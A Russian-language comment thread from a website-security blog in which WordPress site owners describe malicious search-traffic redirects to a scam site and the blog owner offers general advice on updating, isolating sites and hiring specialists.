0 # liza 01.03.2018 20:35
Цитирую Protect Your Site:
А так больше бесплатных аналогов нету.

Начала заниматься с вордпресс совсем недавно, и как этот движок самый распространенны й то ломают его часто, хотелось бы как сказать во все оружие встретить если что
Вроде бесплатных много есть плагинов, но не ставить же все подряд, чтобы конфликта не было
Если есть мысль было бы хорошо

Насчет крона это не про меня, не настолько понимаю

В любом случае спасибо что подсказали
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 02.03.2018 08:00
Регулярно обновляйтесь, не ставьте варезные темы и плагины, настройте безопасность вордпресса по статье https://protectyoursite.ru/полезные-материалы/удаляем-следы-wordpress-с-сайта и не нужны будут вам лишние плагины, тормозящие сайт.
Ответить | Ответить с цитатой | Цитировать
0 # Кирилл 05.11.2018 06:42
Добрый день всем.
Пишу из за того что не знаю что уже делать. у меня на сайтах укакой то вирус который делает редирект с них. только в том случае если человек перрвый раз переходит из поисковиков путем нажатия на ссылку ведущую на мой сайт.

- Человек не попадает ко мне а сперва на сайт лохотрон - http://reposted.pro (ранее перенаправляло на pay.wew.ru они сменили домен) смотрите как это происходит - https://youtu.be/JQNkwBtZbX8 на хостинге прошу помощи уже много дней, что то погли выяснить из онлайн поддержки, техническая поддержка отмахивается и помогать не хочет, дескать это не наша проблема.

- Дело в том что эта "зараза" распростроняетс я и на поддомене.
Мы уже все снесли, все конструкторы и установили сайты заново, чистые аккуратно и без вируса, становится понятно что дело не в сайтах, не в их коде, Свои пк Ноутбук проверены разными антивирусами, но все ровно идет редирект, мы выходили специально даже от друзей, где они вообще ни имею отношения к нашим сайтам, но и там все происходит как на ролике выше. остается только один голый домен. помогите пожалуйста решить эту проблему, у меня весь трафик уходит налево, да ладно если бы просто уходил, так он ведет на проверенны лохотрон, люди страдают.

Я уже не сплю долгое время.
Да, и проверял на редирект разными сервисами в сети (бесплатными),
пишет редирект не обнаружен, Но когда проверяли вот этим https://www.revisium.com/ai/
онлай сканером, редирект был выявлен,

вот сам домен - http://joxi.ru/ZrJZYLdi9xOzlr
вот его первый поддомен - http://joxi.ru/MAjxoPbC4NJO6m
второй поддомен - http://joxi.ru/MAjxoPbC4NJK6m (этот совсем свежий, еще не прошла его полная установка) везде один и то же лохотронский сайт.

и так на всех моих сайтах и их поддоменах.
Я точно знаю что дело не в сайтах и не моих ПК.
Дело в самих доменах. Помогите прошу люди решить эту задачу.
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 05.11.2018 07:14
Добрый день!
У вас проблема в том, что сайты не изолированы друг от друга. Именно поэтому за минуту спокойно перезаражаются остальные сайты. Когда сайты будут разнесены друг от друга, тогда и надо каждый сайт пролечивать и устранять уязвимости.
Ответить | Ответить с цитатой | Цитировать
0 # Кирилл 05.11.2018 07:29
дело не в сайтах еще раз повторюсь. были снесены все конструкторы. установлены сайты на глый домен. как может быть заражен сам домен? поддомены понятно, они ссылаются в первую очередь на сам домен, тем самым и цепляют первое перенаправление . дело все в соновном домене.
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 05.11.2018 08:04
Домен не может заражать сам по себе.
Вы нашли уязвимость, чтобы утверждать, что проблема в домене?
С чего Вы уверены, что изначально устанавливаете без вируса?
То, что сносили конструкторы, ничего не значит, вариантов попадания вирусов множество - от заражения хостинга до атак по уязвимостям.
Настоятельно рекомендую Вам обратиться к специалистам безопасности на платной основе, если сами не можете справиться с проблемой.
Ответить | Ответить с цитатой | Цитировать
-1 # Кирилл 05.11.2018 08:36
посоветуйте
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 05.11.2018 09:29
Специалистов ? Можете написать мне на и там уже обсудим более детально.
Ответить | Ответить с цитатой | Цитировать
0 # Кирилл 05.11.2018 10:01
ок. уже пишу
Ответить | Ответить с цитатой | Цитировать
0 # оксана 02.04.2019 21:28
Доброго времени суток. у меня проблема возникла. Пс сообщила о понижении мобильного трафика из-за обмана пользователей. траф упал почти на 70%. я так понимаю это и есть мобильный редирект. но как его найти правильно? не подскажите в каком файле может находится?
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 03.04.2019 06:26
Добрый день! Вам стоит просканировать сайт на вирусы, если не получается самим, то обратиться к специалистам на платной основе. Если действительно конечно проблема в вирусе, а не в обмане пользователей)
Ответить | Ответить с цитатой | Цитировать
Добавить комментарий